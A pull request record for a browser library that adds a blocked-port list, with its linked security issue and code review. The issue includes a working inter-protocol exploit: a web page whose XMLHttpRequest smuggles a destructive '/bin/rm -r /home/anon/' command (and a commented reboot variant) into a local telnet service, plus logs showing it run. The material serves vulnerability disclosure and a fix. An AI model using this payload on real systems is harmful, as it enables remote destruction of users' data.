### PR TITLE
LibWeb: Add port blacklist for ResourceLoader::load

### LINKED ISSUE #1735: LibWeb: ResourceLoader::load should prevent access to potentially vulnerable network services
Modern web browsers maintain a blacklist of ports associated with services vulnerable to [inter-protocol exploitation](https://en.wikipedia.org/wiki/Inter-protocol_exploitation) and prevent access to these ports.

* https://www-archive.mozilla.org/projects/netlib/portbanning#portlist
* https://neo4j.com/developer/kb/list-of-restricted-ports-in-browsers/

For example, if the `TelnetServer` is running, it is possible for third-party remote websites to communicate with the service on the local network interface (using various techniques), resulting in remote execution of arbitrary commands (possibly as `root`).

Exploitation is trivial using `XMLHttpRequest` as the `TelnetServer` does not yet support authentication and the browser does not yet enforce same-origin policy (SOP) #1615.

```sh
$ TelnetServer -p 2424
```

```html
<html>
  <head>
    <title>hello friends</title>
  </head>
  <body>
    <script>
    try {
      var xhr = new XMLHttpRequest();
      xhr.addEventListener("load", function() { alert(this.responseText); });
      //xhr.open("GET", "http://127.0.0.1:2424/;paddingAA;/bin/reboot;");
      xhr.open("GET", "http://127.0.0.1:2424/;paddingAA;/bin/rm -r /home/anon/; echo");
      xhr.send();
    } catch(e) {
      alert('error:' + e.message);
    }
    </script>
  </body>
</html>
```

```
Browser(22): HtmlView::load: http://172.16.191.165/root.html
ProtocolServer(23): TCPSocket{0x029d020e} connection appears to have closed in receive().
[ProtocolServer(23:23)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
Browser(22): sweep_dead_cells:
Browser(22):   ~ Shape{0x01af400c}
Browser(22):   ~ ObjectPrototype{0x01af403c}
Browser(22):   ~ Shape{0x01af406c}
Browser(22):   ~ NativeFunction{0x01af409c}
Browser(22):   ~ Shape{0x01af40cc}
Browser(22):   ~ Shape{0x01af40fc}
Browser(22):   ~ Shape{0x01af412c}
Browser(22):   ~ NativeFunction{0x01af415c}
Browser(22):   ~ Shape{0x01af418c}
Browser(22):   ~ Shape{0x01af41bc}
Browser(22):   ~ Shape{0x01af41ec}
Browser(22):   ~ NativeFunction{0x01af421c}
Browser(22):   ~ Shape{0x01af424c}
Browser(22):   ~ Shape{0x01af427c}
Browser(22):   ~ Shape{0x01af42ac}
Browser(22):   ~ FunctionPrototype{0x01af42dc}
Browser(22):   ~ NativeFunction{0x01af430c}
Browser(22):   ~ Shape{0x01af433c}
Browser(22):   ~ Shape{0x01af436c}
Browser(22):   ~ Shape{0x01af439c}
Browser(22):   ~ NativeFunction{0x01af43cc}
Browser(22):   ~ Shape{0x01af43fc}
Browser(22):   ~ Shape{0x01af442c}
Browser(22):   ~ Shape{0x01af445c}
Browser(22):   ~ NativeFunction{0x01af448c}
Browser(22):   ~ Shape{0x01af44bc}
Browser(22)[TelnetServer(21:21)]: LoopbackAdapter: Sending 66 byte(s) to myself.
:   ~ Shape{0x01af44ec}
Browser(22):   ~ Shape{0x01af451c}
Browser(22):   ~ NativeFunction{0x01af454c}
Browser(22):   ~ Shape{0x01af457c}
Browser(22):   ~ Shape{0x01af45ac}
Browser(22):   ~ Shape{0x01af45dc}
Browser(22):   ~ Shape{0x01af460c}
Browser(22):   ~ StringPrototype{0x01af463c}
Browser(22):   ~ NativeProperty{0x01af466c}
Browser(22):   ~ Shape{0x01af469c}
[TelnetServer(24:24)]: do_exec(/bin/Shell)
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
Browser(22):   ~ NativeFunction{0x01af46cc}
Browser(22):   ~ Shape{0x01af46fc}
Browser(22):   ~ Shape{0x01af472c}
Browser(22):   ~ Shape{0x01af475c}
Browser(22)[0[ProtocolServer(23:23)]: LoopbackAdapter: Sending 128 byte(s) to myself.
m:   ~ NativeFunction{0x01af478c}
Browser(22):   ~ Shape{0x01af47bc}
Browser(22):   ~ Shape{0x01af47ec}
Browser(22):   ~ Shape{0x01af481c}
Browser(22):   ~ NativeFunction{0x01af484c}
Browser(22):   ~ Shape{0x01af487c}
B[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
rowser(22):   ~ Shape{0x01af48ac}
Browser(22):   ~ Shape{0x01af48dc}
Browser(22):   ~ NativeFunction{0x01af490c}
Browser(22):   ~ Shape{0x01af493c}
Browser(22):   ~ Shape{0x01af496c}
Browser(22):   ~ Shape{0x01af499c}
Browser(22):   ~ NativeFunction{0x01af49cc}
Browser(22):   ~ Shape{0x01af49fc}
Browser(22):   ~ Shape{0x01af4a2c}
Browser(22):   ~ Shape{0x01af4a5c}
Browser(22):   ~ NativeFunction{0x01af4a8c}
Browser(22):   ~ Shape{0x01af4abc}
Browser(22):   ~ Shape{0x01af4aec}
Browser(22):   ~ Shape{0x01af4b1c}
Browser(22):   ~ ArrayPrototype{0x01af4b4c}
Browser(22):   ~ NativeFunction{0x01af4b7c}
Browser(22):   ~ Shape{0x01af4bac}
Browser(22):   ~ Shape{0x01af4bdc}
Browser(22):   ~ Shape{0x01af4c0c}
Browser(22):   ~ NativeFunction{0x01af4c3c}
Browser(22):   ~ Shape{0x01af4c6c}
Browser(22):   ~ Shape{0x01af4c9c}
Browser(22):   ~ Shape{0x01af4ccc}
Browser(22):   ~ NativeFunction{0x01af4cfc}
Browser(22):   ~ Shape{0x01af4d2c}
Browser(22):   ~ Shape{0x01af4d5c}
Browser(22):   ~ Shape{0x01af4d8c}
Browser(22):   ~ NativeFunction{0x01af4dbc}
Browser(22):   ~ Shape{0x01af4dec}
Browser(22):   ~ Shape{0x01af4e1c}
Browser(22):   ~ Shape{0x01af4e4c}
Browser(22):   ~ Shape{0x01af4e7c}
Browser(22):   ~ ErrorPrototype{0x01af4eac}
Browser(22):   ~ NativeProperty{0x01af4edc}
Browser(22):   ~ Shape{0x01af4f0c}
Browser(22):   ~ NativeProperty{0x01af4f3c}
Browser(22):   ~ Shape{0x01af4f6c}
Browser(22):   ~ NativeFunction{0x01af4f9c}
Browser(22):   ~ Shape{0x01af4fcc}
Browser(22):   ~ Shape{0x01af4ffc}
Browser(22):   ~ Shape{0x01af502c}
Browser(22):   ~ DatePrototype{0x01af505c}
Browser(22):   ~ NativeFunction{0x01af508c}
Browser(22):   ~ Shape{0x01af50bc}
Browser(22):   ~ Shape{0x01af50ec}
Browser(22):   ~ Shape{0x01af511c}
Browser(22):   ~ NativeFunction{0x01af514c}
Browser(22):   ~ Shape{0x01af517c}
Browser(22):   ~ Shape{0x01af51ac}
Browser(22):   ~ Shape{0x01af51dc}
Browser(22):   ~ NativeFunction{0x01af520c}
Browser(22):   ~ Shape{0x01af523c}
Browser(22):   ~ Shape{0x01af526c}
Browser(22):   ~ Shape{0x01af529c}
Browser(22):   ~ NativeFunction{0x01af52cc}
Browser(22):   ~ Shape{0x01af52fc}
Browser(22):   ~ Shape{0x01af532c}
Browser(22):   ~ Shape{0x01af535c}
Browser(22):   ~ NativeFunction{0x01af538c}
Browser(22):   ~ Shape{0x01af53bc}
Browser(22):   ~ Shape{0x01af53ec}
Browser(22):   ~ Shape{0x01af541c}
Browser(22):   ~ NativeFunction{0x01af544c}
Browser(22):   ~ Shape{0x01af547c}
Browser(22):   ~ Shape{0x01af54ac}
Browser(22):   ~ Shape{0x01af54dc}
Browser(22):   ~ NativeFunction{0x01af550c}
Browser(22):   ~ Shape{0x01af553c}
Browser(22):   ~ Shape{0x01af556c}
Browser(22):   ~ Shape{0x01af559c}
Browser(22):   ~ NativeFunction{0x01af55cc}
Browser(22):   ~ Shape{0x01af55fc}
Browser(22):   ~ Shape{0x01af562c}
Browser(22):   ~ Shape{0x01af565c}
Browser(22):   ~ NativeFunction{0x01af568c}
Browser(22):   ~ Shape{0x01af56bc}
Browser(22):   ~ Shape{0x01af56ec}
Browser(22):   ~ Shape{0x01af571c}
Browser(22):   ~ NativeFunction{0x01af574c}
Browser(22):   ~ Shape{0x01af577c}
Browser(22):   ~ Shape{0x01af57ac}
Browser(22):   ~ Shape{0x01af57dc}
Browser(22):   ~[TelnetServer(21:21)]: LoopbackAdapter: Sending 218 byte(s) to myself.
 NativeFunction{0x01af580c}
Browser(22):   ~ Shape{0x01af583c}
Browser(22):   ~ Shape{0x01af586c}
Browser(22):   ~ Shape{0x01af589c}
Browser(22):   ~ NativeFunction{0x01af58cc}
Browser(22):   ~ Shape{0x01af58fc}
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[33;1mBrowser(22):   ~ Shape{0x01af592c}
Browser(22):   ~ Shape{0x01af595c}
Browser(22):   ~ NumberPrototype{0x01af598c}
Browser(22):   ~ BooleanPrototype{0x01af59bc}
Browser(22):   ~ NativeFunction{0x01af59ec}
Browser(22):   ~ Shape{0x01af5a1c}
Browser(22):   ~ Shape{0x01af5a4c}
Browser(22):   ~ Shape{0x01af5a7c}
Browser(22):   ~ NativeFunction{0x01af5aac}
Browser(22):   ~ Shape{0x01af5adc}
Browser(22):   ~ Shape{0x01af5b0c}
Browser(22):   ~ Shape{0x01af5b3c}
Browser(22):   ~ NativeFunction{0x01af5b6c}
[33[Shell(25:25)]: do_exec(/bin/rm)
;1mBrowser(22):   ~ Shape{0x01af5b9c}
Browser(22):   ~ Shape{0x01af5bcc}
Browser(22):   ~ Shape{0x01af5bfc}
Browser(22):   ~ NativeFunction{0x01af5c2c}
Browser(22):   ~ Shape{0x01af5c5c}
Browser(22):   ~ Shape{0x01af5c8c}
Browser(22):   ~ Shape{0x01af5cbc}
Browser(22):   ~ Shape{0x01af5cec}
Browser(22):   ~ Shape{0x01af5d1c}
Browser(22):   ~ Shape{0x01af5d4c}
Browser(22):   ~ Shape{0x01af5d7c}
Browser(22):   ~ ConsoleObject{0x01af5dac}
Browser(22):   ~ NativeFunction{0x01af5ddc}
Browser(22):   ~ Shape{0x01af5e0c}
Browser(22):   ~ Shape{0x01af5e3c}
Browser(22):   ~ Shape{0x01af5e6c}
Browser(22):   ~ Shape{0x01af5e9c}
Browser(22):   ~ MathObject{0x01af5ecc}
Browser(22):   ~ NativeFunction{0x01af5efc}
Browser(22):   ~ Shape{0x01af5f2c}
Browser(22):   ~ Shape{0x01af5f5c}
Browser(22):   ~ Shape{0x01af5f8c}
Browser(22):   ~ NativeFunction{0x01af5fbc}
Browser(22):   ~ Shape{0x01af5fec}
Browser(22):   ~ Shape{0x01af601c}
Browser(22):   ~ Shape{0x01af604c}
Browser(22):   ~ NativeFunction{0x01af607c}
Browser(22):   ~ Shape{0x01af60ac}
Browser(22):   ~ Shape{0x01af60dc}
Browser(22):   ~ Shape{0x01af610c}
Browser(22):   ~ NativeFunction{0x01af613c}
Browser(22):   ~ Shape{0x01af616c}
Browser(22):   ~ Shape{0x01af619c}
Browser(22):   ~ Shape{0x01af61cc}
Browser(22):   ~ NativeFunction{0x01af61fc}
Browser(22):   ~ Shape{0x01af622c}
Browser(22):   ~ Shape{0x01af625c}
Browser(22):   ~ Shape{0x01af628c}
Browser(22):   ~ NativeFunction{0x01af62bc}
Browser(22):   ~ Shape{0x01af62ec}
Browser(22):   ~ Shape{0x01af631c}
Browser(22):   ~ Shape{0x01af634c}
Browser(22):   ~ NativeFunction{0x01af637c}
Browser(22):   ~ Shape{0x01af63ac}
Browser(22):   ~ Shape{0x01af63dc}
Browser(22):   ~ Shape{0x01af640c}
Browser(22):   ~ NativeFunction{0x01af643c}
Browser(22):   ~ Shape{0x01af646c}
Browser(22):   ~ Shape{0x01af649c}
Browser(22):   ~ Shape{0x01af64cc}
Browser(22):   ~ NativeFunction{0x01af64fc}
Browser(22):   ~ Shape{0x01af652c}
Browser(22):   ~ Shape{0x01af655c}
Browser(22):   ~ Shape{0x01af658c}
Browser(22):   ~ NativeFunction{0x01af65bc}
Browser(22):   ~ Shape{0x01af65ec}
Browser(22):   ~ Shape{0x01af661c}
Browser(22):   ~ Shape{0x01af664c}
Browser(22):   ~ NativeFunction{0x01af667c}
Browser(22):   ~ Shape{0x01af66ac}
Browser(22):   ~ Shape{0x01af66dc}
Browser(22):   ~ Shape{0x01af670c}
Browser(22):   ~ NativeFunction{0x01af673c}
Browser(22):   ~ Shape{0x01af676c}
Browser(22):   ~ Shape{0x01af679c}
Browser(22):   ~ Shape{0x01af67cc}
Browser(22):   ~ Shape{0x01af67fc}
Browser(22):   ~ Shape{0x01af682c}
Browser(22):   ~ Shape{0x01af685c}
Browser(22):   ~ Shape{0x01af688c}
Browser(22):   ~ Shape{0x01af68bc}
Browser(22):   ~ Shape{0x01af68ec}
Browser(22):   ~ Shape{0x01af691c}
Browser(22):   ~ Shape{0x01af694c}
Browser(22):   ~ Shape{0x01af697c}
Browser(22):   ~ ArrayConstructor{0x01af69ac}
Browser(22):   ~ Shape{0x01af69dc}
Browser(22):   ~ Shape{0x01af6a0c}
Browser(22):   ~ Shape{0x01af6a3c}
Browser(22):   ~ Shape{0x01af6a6c}
Browser(22):   ~ Shape{0x01af6a9c}
Browser(22):   ~ BooleanConstructor{0x01af6acc}
Browser(22):   ~ Shape{0x01af6afc}
Browser(22):   ~ Shape{0x01af6b2c}
Browser(22):   ~ Shape{0x01af6b5c}
Browser(22):   ~ Shape{0x01af6b8c}
Browser(22):   ~ Shape{0x01af6bbc}
Browser(22):   ~ DateConstructor{0x01af6bec}
Browser(22):   ~ Shape{0x01af6c1c}
Browser(22):   ~ Shape{0x01af6c4c}
Browser(22):   ~ Shape{0x01af6c7c}
Browser(22):   ~ NativeFunction{0x01af6cac}
Browser(22):   ~ Shape{0x01af6cdc}
Browser(22):   ~ Shape{0x01af6d0c}
Browser(22):   ~ Shape{0x01af6d3c}
Browser(22):   ~ Shape{0x01af6d6c}
Browser(22):   ~ Shape{0x01af6d9c}
Browser(22):   ~ ErrorConstructor{0x01af6dcc}
Browser(22):   ~ Shape{0x01af6dfc}
Browser(22):   ~ Shape{0x01af6e2c}
Browser(22):   ~ Shape{0x01af6e5c}
Browser(22):   ~ Shape{0x01af6e8c}
Browser(22):   ~ Shape{0x01af6ebc}
Browser(22):   ~ FunctionConstructor{0x01af6eec}
Browser(22):   ~ Shape{0x01af6f1c}
Browser(22):   ~ Shape{0x01af6f4c}
Browser(22):   ~ Shape{0x01af6f7c}
Browser(22):   ~ Shape{0x01af6fac}
Browser(22):   ~ Shape{0x01af6fdc}
Browser(22):   ~ NumberConstructor{0x01af700c}
Browser(22):   ~ Shape{0x01af703c}
Browser(22):   ~ NativeFunction{0x01af706c}
Browser(22):   ~ Shape{0x01af709c}
Browser(22):   ~ Shape{0x01af70cc}
Browser(22):   ~ Shape{0x01af70fc}
Browser(22):   ~ Shape{0x01af712c}
Browser(22):   ~ Shape{0x01af715c}
Browser(22):   ~ Shape{0x01af718c}
Browser(22):   ~ Shape{0x01af71bc}
Browser(22):   ~ Shape{0x01af71ec}
Browser(22):   ~ Shape{0x01af721c}
Browser(22):   ~ Shape{0x01af724c}
Browser(22):   ~ Shape{0x01af727c}
Browser(22):   ~ Shape{0x01af72ac}
Browser(22):   ~ Shape{0x01af72dc}
Browser(22):   ~ ObjectConstructor{0x01af730c}
Browser(22):   ~ Shape{0x01af733c}
Browser(22):   ~ Shape{0x01af736c}
Browser(22):   ~ NativeFunction{0x01af739c}
Browser(22):   ~ Shape{0x01af73cc}
Browser(22):   ~ Shape{0x01af73fc}
Browser(22):   ~ Shape{0x01af742c}
Browser(22):   ~ NativeFunction{0x01af745c}
Browser(22):   ~ Shape{0x01af748c}
Browser(22):   ~ Shape{0x01af74bc}
Browser(22):   ~ Shape{0x01af74ec}
Browser(22):   ~ NativeFunction{0x01af751c}
Browser(22):   ~ Shape{0x01af754c}
Browser(22):   ~ Shape{0x01af757c}
Browser(22):   ~ Shape{0x01af75ac}
Browser(22):   ~ NativeFunction{0x01af75dc}
Browser(22):   ~ Shape{0x01af760c}
Browser(22):   ~ Shape{0x01af763c}
Browser(22):   ~ Shape{0x01af766c}
Browser(22):   ~ NativeFunction{0x01af769c}
Browser(22):   ~ Shape{0x01af76cc}
Browser(22):   ~ Shape{0x01af76fc}
Browser(22):   ~ Shape{0x01af772c}
Browser(22):   ~ Shape{0x01af775c}
Browser(22):   ~ Shape{0x01af778c}
Browser(22):   ~ Shape{0x01af77bc}
Browser(22):   ~ NativeProperty{0x01af77ec}
Browser(22):   ~ Shape{0x01af781c}
Browser(22):   ~ NativeFunction{0x01af784c}
Browser(22):   ~ Shape{0x01af787c}
Browser(22):   ~ Shape{0x01af78ac}
Browser(22):   ~ Shape{0x01af78dc}
Browser(22):   ~ NativeFunction{0x01af790c}
Browser(22):   ~ Shape{0x01af793c}
Browser(22):   ~ Shape{0x01af796c}
Browser(22):   ~ Shape{0x01af799c}
Browser(22):   ~ NativeFunction{0x01af79cc}
Browser(22):   ~ Shape{0x01af79fc}
Browser(22):   ~ Shape{0x01af7a2c}
Browser(22):   ~ Shape{0x01af7a5c}
Browser(22):   ~ NativeFunction{0x01af7a8c}
Browser(22):   ~ Shape{0x01af7abc}
Browser(22):   ~ Shape{0x01af7aec}
Browser(22):   ~ Shape{0x01af7b1c}
Browser(22):   ~ NativeFunction{0x01af7b4c}
Browser(22):   ~ Shape{0x01af7b7c}
Browser(22):   ~ Shape{0x01af7bac}
Browser(22):   ~ Shape{0x01af7bdc}
Browser(22):   ~ NavigatorObject{0x01af7c0c}
Browser(22):   ~ PrimitiveString{0x01af7c3c}
Browser(22):   ~ Shape{0x01af7c6c}
Browser(22):   ~ PrimitiveString{0x01af7c9c}
Browser(22):   ~ Shape{0x01af7ccc}
Browser(22):   ~ PrimitiveString{0x01af7cfc}
Browser(22):   ~ Shape{0x01af7d2c}
Browser(22):   ~ PrimitiveString{0x01af7d5c}
Browser(22):   ~ Shape{0x01af7d8c}
Browser(22):   ~ PrimitiveString{0x01af7dbc}
Browser(22):   ~ Shape{0x01af7dec}
Browser(22):   ~ PrimitiveString{0x01af7e1c}
Browser(22):   ~ Shape{0x01af7e4c}
Browser(22):   ~ Shape{0x01af7e7c}
Browser(22):   ~ XMLHttpRequestPrototype{0x01af7eac}
Browser(22):   ~ NativeFunction{0x01af7edc}
Browser(22):   ~ Shape{0x01af7f0c}
Browser(22):   ~ Shape{0x01af7f3c}
Browser(22):   ~ Shape{0x01af7f6c}
Browser(22):   ~ NativeFunction{0x01af7f9c}
Browser(22):   ~ Shape{0x01af7fcc}
Browser(22):   ~ WindowObject{0x01afc00c}
Browser(22):   ~ Shape{0x01afc05c}
Browser(22):   ~ Shape{0x01afc0ac}
Browser(22):   ~ NativeProperty{0x01afc0fc}
Browser(22):   ~ Shape{0x01afc14c}
Browser(22):   ~ XMLHttpRequestConstructor{0x01afc19c}
Browser(22):   ~ Shape{0x01afc1ec}
Browser(22):   ~ Shape{0x01afc23c}
Browser(22):   ~ Shape{0x01afc28c}
Browser(22):   ~ Shape{0x01afc2dc}
Browser(22):   ~ Shape{0x01afc32c}
Browser(22):   ~ Object{0x01afc37c}
Browser(22):   ~ Shape{0x01afc3cc}
Browser(22):   ~ XMLHttpRequestWrapper{0x01afc41c}
Browser(22):   ~ NativeFunction{0x01afc46c}
Browser(22):   ~ Shape{0x01afc4bc}
Browser(22):   ~ Shape{0x01afc50c}
Browser(22):   ~ Shape{0x01afc55c}
Browser(22):   ~ Shape{0x01afc5ac}
Browser(22):   ~ PrimitiveString{0x01afc5fc}
Browser(22):   ~ ScriptFunction{0x01afc64c}
Browser(22):   ~ Shape{0x01afc69c}
Browser(22):   ~ Object{0x01afc6ec}
Browser(22):   ~ Shape{0x01afc73c}
Browser(22):   ~ NativeProperty{0x01afc78c}
Browser(22):   ~ Shape{0x01afc7dc}
Browser(22):   ~ PrimitiveString{0x01afc82c}
Browser(22):   ~ PrimitiveString{0x01afc87c}
Browser(22):  - Reclaim HeapBlock @ 0x01af4000: cell_size=48
Browser(22):  - Reclaim HeapBlock @ 0x01afc000: cell_size=80
[ProtocolServer(23:23)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[TelnetServer(21:21)]: /dev/pts/1: Send signal 1 to everyone in pgrp 25
[TelnetServer(21:21)]: /dev/pts/1: Send signal 1 to rm(25)
[TelnetServer(21:21)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[Clock.MenuApplet(8:8)]: Terminating due to signal 1
[NetworkTask(5:5)]: handle_tcp: unexpected flags in FinWait2 state
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[NetworkTask(5:5)]: handle_tcp: unexpected flags in LastAck state
[NetworkTask(5:5)]: LoopbackAdapter: Sending 54 byte(s) to myself.
[NetworkTask(5:5)]: handle_tcp: No TCP socket for tuple 127.0.0.1:52096 -> 127.0.0.1:2424
[NetworkTask(5:5)]: handle_tcp: source=127.0.0.1:2424, destination=127.0.0.1:52096 seq_no=1177, ack_no=0, flags=0004 (RST ), window_size=1024, payload_size=0
Browser(22): XHR failed to load: HTTP load failed
Shell(24): Command "/bin/rm -r /home/anon/; echo HTTP/1.0" finished in 675 ms
[Shell(26:26)]: do_exec(/bin/echo)
Shell(24): Command "/bin/rm -r /home/anon/; echo HTTP/1.0" finished in 141 ms
Shell(24): Terminal DSR issue; received no response
[SyncTask(2:2)]: Ext2FS: Flushed 11 blocks to disk
[SyncTask(2:2)]: Ext2FS: Decremented bg_used_dirs_count to 10
[SyncTask(2:2)]: Ext2FS: Decremented bg_used_dirs_count to 9
Browser(22): Undo stack increased to 2
[SyncTask(2:2)]: Ext2FS: Flushed 6 blocks to disk
```

### PR DESCRIPTION
**Pull request by bcoles**
`ResourceLoader::load` now rejects URLs which specify a `port`
associated with network services known to be vulnerable to
inter-protocol exploitation.

Fixes #1735

```
Browser(21): HtmlView::load: http://172.16.191.165/root.html
ProtocolServer(22): TCPSocket{0x00ed0406} connection appears to have closed in receive().
Browser(21): ResourceLoader::load: Error: blocked port 23 for URL: http://127.0.0.1:23/;paddingAA;/bin/rm -r /home/anon/; echo
```

Note that this won't prevent inter-protocol exploitation against services which are not running on their default assigned port.

This PR does not address the secondary issue related to URL encoding. URL paths and query strings should be automatically URL encoded before loading. This is a separate bug, which potentially affects all resource loading, and is outside the scope of this PR.

### CODE REVIEW

**Comment by xTibor** [comment]
Wouldn't a whitelist with known HTTP ports (80, 443, 8000, 8080, etc) make more sense?

**Comment by bcoles** [comment]
> 
> 
> Wouldn't a whitelist with known HTTP ports (80, 443, 8000, 8080, etc) make more sense?

Whitelists are generally preferred over blacklists. A blacklist obviously won't protect services running on non-standard ports. But the general consensus (Chrome, Firefox) is a whitelist isn't feasible for the web. It is too inconvenient as too many services run on too many ports. For instance, your proposed whitelist misses `8443`, and `81`, and `8081`, and `3000`, and ...

If a whitelist were implemented, it should be easily user-configurable, so the user doesn't have to recompile.

**Comment by xTibor** [comment]
Also I think this would be better to implement on a lower level. You fix LibWeb by this PR but every other application using HTTP though ProtocolServer or LibCore remains still vulnerable.

**Comment by bcoles** [comment]
> 
> 
> Also I think this would be better to implement on a lower level. You fix LibWeb by this PR but every other application using HTTP though ProtocolServer or LibCore remains still vulnerable.

This is a client issue, by virtue of downloading and parsing or executing arbitrary code from remote hosts, for subsequent loading of resources.

It is a good idea to build a system with security in mind from the ground up, and blocking requests to potentially vulnerable services at a low level is an interesting approach. However, `ProtocolServer` and `LibCore` are not context aware, which is important in determining whether a request should be blocked. Are `ProtocolServer` and `LibCore` used anywhere to load arbitrary resources specified by a remote service?

I'm looking to replicate existing functionality in other systems. For example, `curl http://127.0.0.1:23/` will not be blocked on any system. Although you could make an argument that perhaps it should be.

File: Libraries/LibWeb/ResourceLoader.cpp [hunk 1]
```diff
@@ -112,4 +117,16 @@ void ResourceLoader::load(const URL& url, Function<void(const ByteBuffer&)> succ
...
 
+bool ResourceLoader::is_port_blocked(int port) {
+    int ports[] { 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42,
+        43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113,
+        115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514,
+        515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995,
+        2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669 };
+    for (int i=0; i<(int)(sizeof(ports)/sizeof(ports[0])); i++)
+        if (ports[i] == port)
+            return true;
```
Comment (awesomekling) [inline Libraries/LibWeb/ResourceLoader.cpp:128]:
```suggestion
    for (auto blocked_port : ports) {
        if (port == blocked_port)
            return true;
    }
```
